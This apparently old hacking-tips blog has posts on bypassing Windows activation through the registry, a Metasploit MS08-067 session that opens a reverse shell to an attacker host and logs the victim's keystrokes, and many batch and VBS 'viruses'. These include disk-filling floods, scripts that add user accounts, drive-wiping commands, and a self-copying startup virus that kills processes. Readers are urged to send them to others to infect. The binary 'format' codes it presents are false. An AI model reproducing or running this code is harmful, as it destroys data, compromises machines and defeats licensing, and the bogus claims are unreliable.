Friday, December 4, 2009
Making Windows SP2 and SP3 Genuine through the Registry
1. Open Run and type regedit.
2. Then follow the path
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\WPAEVENTS
3. Then on the right side you have to change the default hex value of OOBETimer to "ff d5 71 d6 8b 6a 8d 6f d5 33 93 fd".
4. Then right-click on WPAEvents -> Permissions, click on SYSTEM and set the permissions for SYSTEM by ticking Deny for both Full Control and Read.
5. You are almost done; now restart the system and it's all done. Enjoy.
Friday, November 13, 2009
Remote Keylogging with Backtrack
$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID  Name          Path
---  ----          ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 316
[*] Migrating to 316…
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 316
meterpreter > grabdesktop
Trying to hijack the input desktop…
meterpreter > keyscan_start
Starting the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
This is a test of the keystroke logger
Friday, September 25, 2009
Folder Lock without any S/W
After creating the Locker folder, click locker.bat again; it will ask for confirmation. Press Y and the Locker folder will disappear. To get it back, click locker.bat again and enter your password; you will get the folder back.
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Simple Virus making
Here are some good viruses. I am not responsible for any kind of damage to your system ... :)
Copy this into Notepad and save it as flood1.bat.
@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start
:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5
:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4
:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3
:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2
:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original
:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1
What does it do: this is an extremely harmful virus that will keep replicating itself until your hard drive is totally full and will destroy your computer.
A simple binary code that can format the system drive and secondary drives...
Copy the following into Notepad exactly as it is:
01001011000111110010010101010101010000011111100000
Save As An EXE Any Name Will Do
Send the EXE to People And Infect
Some other interesting formatting codes....
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your drive d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
Some more interesting stuff ..
open notepad
erase c:\windows
and save as
FINDOUTANAME.cmd
What does it do: it will erase c:/windows ...... Lol
Here is another one which is funny......
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "Your computer has committed suicide. Have a nice day."
This code is about multiple open windows, meaning infinite windows until you restart the computer. Save it as denger.bat, with the code written in Notepad:
@echo off
copy 0% denger.bat
start denger.bat
This code is about shutting the computer down:
@echo off
shutdown -s -t 5 -c "Shutdown"
Go to Notepad and type the following:
@Echo off
Del C:\ *.*|y
Save it as Dell.bat
Want worse? Then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
One more ...
Try this one:
Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q
Then it is complete. Save it as any file you want in .bat format, and enjoy, lol. It's really dangerous; don't try it on your own PC.
How to add your own created viruses to startup; this will make them difficult to detect and to remove ...
For this you need registry updater software; you can get it from here:
http://www.mutantsrus.com/Update.reg
Now move your .bat file to c:/windows and then simply run this software; your virus will be added to your startup. I tried this with shutdown: as my computer starts, it shuts down after 2 seconds, lol.
Do not try it on your PC. Don't mess around; this is for educational purposes only.
Shut Down Your Friend's Mobile
With this trick only the Nokia 1110, 1110i, 1112, 1100 and 2100 can be restarted.
Just type
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
or 79 inverted commas
in a text message and send it to your friend who has one of the phones mentioned above, and see what happens.
Complete Project Report On malwares from Desktop to mobile
INTRODUCTION TO VIRUSES
1. INTRODUCTION
Do viruses and all the other nasties in cyberspace matter? Do they really do much harm? Imagine that no one has updated your anti-virus software for a few months. When they do, you find that your accounts spreadsheets are infected with a new virus that changes figures at random. Naturally you keep backups. But you might have been backing up infected files for months. How do you know which figures to trust? Now imagine that a new email virus has been released. Your company is receiving so many emails that you decide to shut down your email gateway altogether and miss an urgent order from a big customer. Imagine that a friend emails you some files he found on the Internet. You open them and trigger a virus that mails confidential documents to everyone in your address book, including your competitors. Finally, imagine that you accidentally send another company a report that carries a virus. Will they feel safe to do business with you again? Today new viruses sweep the planet in hours and virus scares are major news.
A computer virus is a computer program that can spread across computers and networks by making copies of itself, usually without the user’s knowledge. Viruses can have harmful side effects. These can range from displaying irritating messages to deleting all the files on your computer.
A virus program has to be run before it can infect your computer. Viruses have ways of making sure that this happens. They can attach themselves to other programs or hide in code that is run automatically when you open certain types of files. The virus can copy itself to other files or disks and make changes on your computer. Virus side effects, often called the payload, are the aspect of most interest to users. Password-protecting the documents on a particular day, mailing information about the user and machine to an address somewhere are some of the harmful side effects of viruses. Various kinds of viruses include macro virus, parasitic or file virus, Boot virus,
E-mails are the biggest source of viruses. Usually they come as attachments to emails. The Internet caused the spreading of viruses around the globe. The threat level depends on the particular code used in the web pages and the security measures taken by service providers and by you. One solution to prevent viruses is anti-virus software. Anti-virus software can detect viruses, prevent access to infected files and often eliminate the infection.
Computer viruses are starting to affect mobile phones too. Such viruses are rare and unlikely to cause much damage. Anti-virus experts expect that as mobile phones become more sophisticated they will be targeted by virus writers. Some firms are already working on anti-virus software for mobile phones. VBS/Timo-A, Love Bug, Timofonica, CABIR, aka ACE-? and UNAVAILABLE are some of the viruses that affect mobile phones.
BASIC CONCEPTS OF VIRUS
1.2 What is a virus?
A computer virus is a computer program that can spread across computers and networks by making copies of itself, usually without the user’s knowledge. Viruses can have harmful side-effects. These can range from displaying irritating messages to deleting all the files on your computer.
1.3 Evolution of virus
In the mid-1980s Basit and Amjad Alvi of
1.3.1 History of Viruses
Traditional computer viruses were first widely seen in the late 1980s, and they came about because of several factors. The first factor was the spread of personal computers (PCs). Prior to the 1980s, home computers were nearly non-existent or they were toys. Real computers were rare, and they were locked away for use by "experts." During the 1980s, real computers started to spread to businesses and homes because of the popularity of the IBM PC (released in 1982) and the Apple Macintosh (released in 1984). By the late 1980s, PCs were widespread in businesses, homes and college campuses.
The second factor was the use of computer bulletin boards. People could dial up a bulletin board with a modem and download programs of all types. Games were extremely popular, and so were simple word processors, spreadsheets and other productivity software. Bulletin boards led to the precursor of the virus known as the Trojan horse. A Trojan horse is a program with a cool-sounding name and description. So you download it. When you run the program, however, it does something uncool like erasing your disk. You think you are getting a neat game, but it wipes out your system. Trojan horses only hit a small number of people because they are quickly discovered, the infected programs are removed and word of the danger spreads among users.
The third factor that led to the creation of viruses was the floppy disk. In the 1980s, programs were small, and you could fit the entire operating system, a few programs and some documents onto a floppy disk or two. Many computers did not have hard disks, so when you turned on your machine it would load the operating system and everything else from the floppy disk. Virus authors took advantage of this to create the first self-replicating programs.
Early viruses were pieces of code attached to a common program like a popular game or a popular word processor. A person might download an infected game from a bulletin board and run it. A virus like this is a small piece of code embedded in a larger, legitimate program. When the user runs the legitimate program, the virus loads itself into memory and looks around to see if it can find any other programs on the disk. If it can find one, it modifies the program to add the virus's code into the program. Then the virus launches the "real program." The user really has no way to know that the virus ever ran. Unfortunately, the virus has now reproduced itself, so two programs are infected. The next time the user launches either of those programs, they infect other programs, and the cycle continues.
If one of the infected programs is given to another person on a floppy disk, or if it is uploaded to a bulletin board, then other programs get infected. This is how the virus spreads.
The spreading part is the infection phase of the virus. Viruses wouldn't be so violently despised if all they did was replicate themselves. Most viruses also have a destructive attack phase where they do damage. Some sort of trigger will activate the attack phase, and the virus will then do something -- anything from printing a silly message on the screen to erasing all of your data. The trigger might be a specific date, the number of times the virus has been replicated or something similar.
In the next section, we will look at how viruses have evolved over the years.
2. VIRUS EFFECTS AND VIRUS RISKS
2.1 How does a virus infect computers?
A virus program has to be run before it can infect your computer. Viruses have ways of making sure that this happens. They can attach themselves to other programs or hide in code that is run automatically when you open certain types of files. You might receive an infected file on a disk, in an email attachment, or in a download from the internet. As soon as you launch the file, the virus code runs. Then the virus can copy itself to other files or disks and make changes on your computer.
2.2 Who writes viruses?
Virus writers don’t gain in financial or career terms; they rarely achieve real fame; and, unlike hackers, they don’t usually target particular victims, since viruses spread too indiscriminately. Virus writers tend to be male, under 25 and single. Viruses also give their writers powers in cyberspace that they could never hope to have in the real world.
2.3 Virus side effects(Payload)
Virus side-effects are often called the payload. Viruses can disable computer hardware, change the figures in an accounts spreadsheet at random, adversely affect your email contacts and business domain, and attack web servers…
- Messages - WM97/Jerk displays the message ‘I think (user’s name) is a big stupid jerk!’
- Denying access - WM97/NightShade password-protects the current document on Friday 13th.
- Data theft - Troj/LoveLet-A emails information about the user and machine to an address in the
- Corrupting data - XM/Compatable makes changes to the data in Excel spreadsheets.
- Deleting data - Michelangelo overwrites parts of the hard disk on March 6th.
- Disabling hardware - CIH or
attempts to overwrite the BIOS on April 26th, making the machine unusable.
- Crashing servers - Melissa or ExploreZip, which spread via email, can generate so much mail that servers crash.
There is a threat to confidentiality too. Melissa can forward documents, which may contain sensitive information, to anyone in your address book. Viruses can seriously damage your credibility. If you send infected documents to customers, they may refuse to do business with you or demand compensation. Sometimes you risk embarrassment as well as a damaged business reputation. WM/Polypost, for example, places copies of your documents in your name on alt.sex usenet newsgroups.
2.4 Where are the virus risks?
3. MALWARE AND ITS VARIOUS TYPES
3.1 MALWARE
Malware is a general term for any malicious software. It comes in thousands of variants, so malware is a threat to any PC. The variants of malicious software include Trojan horses, spyware, computer worms, keyloggers, rootkits, dialers, rogue security tools, adware and viruses. Some types of PC threats are easy to remove. However, some malware is tough to delete and you need to use a combination of several security tools to remove it, such as antivirus, spyware removal software, a firewall and a standalone PC infection remover.
Malware can cause damage to any infected computer, such as loss of important documents.
3.2 Trojan horses
Trojan horses are programs that do things that are not described in their specifications. The user runs what they think is a legitimate program, allowing it to carry out hidden, often harmful, functions. For example, Troj/Zulu claims to be a program for fixing the ‘millennium bug’ but actually overwrites the hard disk. Trojan horses are sometimes used as a means of infecting a user with a computer virus.
3.3 Backdoor Trojans
A backdoor Trojan is a program that allows someone to take control of another user’s PC via the internet. Like other Trojans, a backdoor Trojan poses as legitimate or desirable software. When it is run (usually on a Windows 95/98 PC), it adds itself to the PC’s startup routine. The Trojan can then monitor the PC until it makes a connection to the internet. Once the PC is on-line, the person who sent the Trojan can use software on their computer to open and close programs on the infected computer, modify files and even send items to the printer. Subseven and Back Orifice are among the best known backdoor Trojans.
3.4 Worms
Worms are similar to viruses but do not need a carrier (like a macro or a boot sector). They are a subtype of viruses. Worms simply create exact copies of themselves and use communications between computers to spread. Many viruses, such as Kakworm (VBS/Kakworm) or Love Bug (VBS/LoveLet-A), behave like worms and use email to forward themselves to other users.
3.5 Spyware
Spyware is a type of malware that is installed on computers and that collects information about users without their knowledge. The presence of spyware is typically hidden from the user. Typically, spyware is secretly installed on the user's personal computer. Sometimes, however, spyware such as keyloggers is installed by the owner of a shared, corporate, or public computer on purpose in order to secretly monitor other users.
While the term spyware suggests software that secretly monitors the user's behavior, the functions of spyware extend well beyond simple monitoring. Spyware programs can collect various types of personal information, such as Internet surfing habits and sites that have been visited, but can also interfere with user control of the computer in other ways, such as installing additional software and redirecting Web browser activity. Spyware is known to change computer settings, resulting in slow connection speeds, different home pages, and/or loss of Internet or functionality of other programs. In an attempt to increase the understanding of spyware, a more formal classification of its included software types is captured under the term privacy-invasive software.
3.6 Rootkit
A rootkit is a software system that consists of a program or combination of several programs designed to hide or obscure the fact that a system has been compromised. Contrary to what its name may imply, a rootkit does not grant a user administrator privileges, as it requires prior access to execute and tamper with system files and processes. An attacker may use a rootkit to replace vital system executables, which may then be used to hide processes and files the attacker has installed, along with the presence of the rootkit. Access to the hardware, e.g., the reset switch, is rarely required, as a rootkit is intended to seize control of the operating system. Typically, rootkits act to obscure their presence on the system through subversion or evasion of standard operating system security scan and surveillance mechanisms such as anti-virus or anti-spyware scan. Often, they are Trojans as well, thus fooling users into believing they are safe to run on their systems. Techniques used to accomplish this can include concealing running processes from monitoring programs, or hiding files or system data from the operating system.[1] Rootkits may also install a "back door" in a system by replacing the login mechanism (such as /bin/login) with an executable that accepts a secret login combination, which, in turn, allows an attacker to access the system, regardless of the changes to the actual accounts on the system.
3.7 Boot sector viruses
Boot sector viruses were the first type of virus to appear. They spread by modifying the boot sector, which contains the program that enables your computer to start up. When you switch on, the hardware looks for the boot sector program – which is usually on the hard disk, but can be on floppy or CD – and runs it. This program then loads the rest of the operating system into memory. A boot sector virus replaces the original boot sector with its own, modified version (and usually hides the original somewhere else on the hard disk). When you next start up, the infected boot sector is used and the virus becomes active. You can only become infected if you boot up your computer from an infected disk, e.g. a floppy disk that has an infected boot sector. Many boot sector viruses are now quite old. Those written for DOS machines do not usually spread on Windows 95, 98, Me, NT or 2000 computers, though they can sometimes stop them from starting up properly.
Boot viruses infect System Boot Sectors (SBS) and Master Boot Sectors (MBS). The MBS is located on all physical hard drives. It contains, among other data, information about the partition table (information about how a physical disk is divided into logical disks), and a short program that can interpret the partition information to find out where the SBS is located. The MBS is operating system independent. The SBS contains, among other data, a program whose purpose is to find and run an operating system. Because floppy diskettes are exchanged more frequently than program files boot viruses are able to propagate more effectively than file viruses.
Form - A virus that is still widespread ten years after it first appeared. The original version triggers on the 18th of each month and produces a click when keys are pressed on the keyboard.
Parity Boot - A virus that may randomly display the message ‘PARITY CHECK’ and freeze the operating system. The message resembles a genuine error message displayed when the computer’s memory is faulty.
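As an added illustration of the MBS layout described above (example code written for this page, not part of the report): the master boot sector holds the boot program in its first 446 bytes, four 16-byte partition table entries, and the 0x55AA signature. The parser below extracts those fields and compares the boot-code hash with a stored baseline, which is the check a boot-sector-virus scanner performs to notice that the original boot program has been replaced. The MBR images are constructed inline; no disk is read.

```python
import hashlib
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 446
# status, CHS start (3 bytes), type, CHS end (3 bytes), LBA start, sector count
ENTRY_FORMAT = "<B3sB3sII"
BOOT_SIGNATURE = b"\x55\xAA"


def build_mbr(boot_code: bytes, partitions) -> bytes:
    """Assemble a 512-byte MBR image from constructed data (no real disk involved).
    partitions: up to four tuples (bootable, type_id, lba_start, sector_count)."""
    if len(boot_code) > PARTITION_TABLE_OFFSET:
        raise ValueError("boot code must fit in 446 bytes")
    if len(partitions) > 4:
        raise ValueError("an MBR partition table has four slots")
    table = b"".join(
        struct.pack(ENTRY_FORMAT, 0x80 if bootable else 0x00, b"\0\0\0",
                    type_id, b"\0\0\0", lba_start, count)
        for bootable, type_id, lba_start, count in partitions)
    return (boot_code.ljust(PARTITION_TABLE_OFFSET, b"\0")
            + table.ljust(64, b"\0") + BOOT_SIGNATURE)


def parse_mbr(sector: bytes) -> dict:
    """Split one sector into boot-code hash, partition entries and signature check."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly one 512-byte sector")
    entries = []
    for slot in range(4):
        off = PARTITION_TABLE_OFFSET + 16 * slot
        status, _, type_id, _, lba_start, count = struct.unpack(ENTRY_FORMAT, sector[off:off + 16])
        if type_id == 0:
            continue  # empty slot
        entries.append({"slot": slot, "bootable": status == 0x80, "type": type_id,
                        "lba_start": lba_start, "sectors": count})
    return {
        "boot_code_sha256": hashlib.sha256(sector[:PARTITION_TABLE_OFFSET]).hexdigest(),
        "partitions": entries,
        "signature_ok": sector[510:] == BOOT_SIGNATURE,
    }


def check_mbr(sector: bytes, baseline_boot_hash: str) -> list:
    """Return findings for an MBR; an empty list means it matches the baseline."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing: sector is not a valid MBR")
    if info["boot_code_sha256"] != baseline_boot_hash:
        findings.append("boot code changed since baseline: possible boot sector virus")
    bootable = [p for p in info["partitions"] if p["bootable"]]
    if len(bootable) != 1:
        findings.append(f"{len(bootable)} partitions flagged bootable (expected 1)")
    spans = sorted((p["lba_start"], p["lba_start"] + p["sectors"]) for p in info["partitions"])
    for (s1, e1), (s2, e2) in zip(spans, spans[1:]):
        if s2 < e1:
            findings.append(f"partition table entries overlap ({s1}-{e1} and {s2}-{e2})")
    for p in info["partitions"]:
        if p["lba_start"] == 0 or p["sectors"] == 0:
            findings.append(f"slot {p['slot']} has a zero LBA start or length")
    return findings


# Constructed sample: a clean MBR, its baseline hash, and a copy whose boot code was replaced.
CLEAN_BOOT_CODE = b"\xEB\x3C\x90SAMPLE-BOOT-CODE" + b"\x90" * 40
PARTITIONS = [(True, 0x07, 2048, 204800), (False, 0x07, 206848, 409600)]
CLEAN_MBR = build_mbr(CLEAN_BOOT_CODE, PARTITIONS)
BASELINE_HASH = parse_mbr(CLEAN_MBR)["boot_code_sha256"]
# Simulated infection: the start of the boot program is overwritten, partition table untouched.
INFECTED_MBR = build_mbr(b"\xEB\x3C\x90INFECTED-BOOT" + CLEAN_BOOT_CODE[16:], PARTITIONS)

if __name__ == "__main__":
    print("clean:", check_mbr(CLEAN_MBR, BASELINE_HASH))
    print("infected:", check_mbr(INFECTED_MBR, BASELINE_HASH))
```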
4. ANALYSING MALWARES
4.1 Simple Virus Making
If you think that Notepad is useless then you are wrong, because you can do a lot of things with Notepad that you could never have imagined. In this hack I will show you how to make a simple .bat file (virus) that can't be detected by any anti-virus.
Here are some good viruses. I am not responsible for any kind of damage to your system ... :)
Copy this into Notepad and save it as flood1.bat.
@ECHO OFF
@ECHO A Sharma’s Creation
@ECHO MAIN BAT RUNNING
GOTO start
:start
@ECHO SET magic2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat
@ECHO NET USER magic2%%magic2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5
:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET pogo=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR pogo%%pogo%% >> bat5.bat
@ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4
:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET hat=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR hat%%hat%% >> bat4.bat
@ECHO SET /a hat=%%hat%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3
:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET chart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR chart%%chart%% >> bat3.bat
@ECHO SET /a chart=%%chart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2
:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET gamer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR gamer%%gamer%% >> bat2.bat
@ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original
:original
CD %HomeDrive%\
SET sharma=1
GOTO flood1
:flood1
MKDIR sharma%sharma%
SET /a sharma=%sharma%+1
GOTO flood1
What does it do: this is an extremely harmful virus that will keep replicating itself until your hard drive is totally full and will destroy your computer.
Batch VIRUS Killing "NORTON, LIMEWIRE, EXPLORER, MSN"
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
It will:
1) Copy itself into startup
2) Copy itself over one thousand times into random spots on your computer
3) Hide itself and all the other files it created
4) Task-kill MSN, Norton, Windows Explorer and LimeWire
5) Swap the left mouse button with the right one
6) Open alert boxes
7) Change the time to 12:00 and shut down the computer
The first code we are going to look at makes the CD tray open and close repeatedly until shutdown, or until you press Ctrl+Alt+Delete, go to Processes and end wscript.exe (don't tell your friends). This code is VBS, so save it in Notepad as whateveryouwant.vbs.
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
end if
A code that turns your Caps Lock on and off repeatedly, also VBS; end it the same way as last time. This toggles Caps Lock every tenth of a second.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Batch file that pops up repeating message boxes:
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * since you are stuck reading
msg * I am gonna tell you a story
msg * bout a dumb guy named (victims name)
msg * who just opened my batch
msg * and got stuck listening to a story
msg * from a computer
msg * so he was opening up batches
msg * when one pops up with a cool msg
msg * then it says "hi"
msg * Hi
msg * Are you having fun?
msg * I am!
msg * have fun playing with this one (insert victim)
msg * Because you have been P-w-n-e-d with a capital "P"
GOTO BEGIN
A batch file that works like a computer password; maybe you could put it in autoexec.exe and make it run at startup?
@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
cls
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%==qwerty goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
:next
erase password.bat
erase password.dat
:hello
cls
echo Turn off PC
goto hello
:done
erase password.dat
erase password.bat
set password=qwerty
prompt $p$g
A batch file that switches your left mouse button with your right one (also, maybe add code to put it in someone's autoexec; that would really make them mad):
@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it
A batch file that will shut down your computer and send a few messages about the Matrix. Rather bland and could be worked on a little more; someone could tweak it a little and I'll repost it and give you credit, perhaps change the DOS text to green.
@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
assoc
assoc
Attrib C:Documents and settings*.*
net share hack=C:
shutdown -s -c 60
This is a VBS file, so of course save it as .vbs; you can replace the text in this code with whatever you want.
Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "M"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 120
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys "o"
wscript.sleep 140
wshshell.sendkeys "n"
wscript.sleep 100
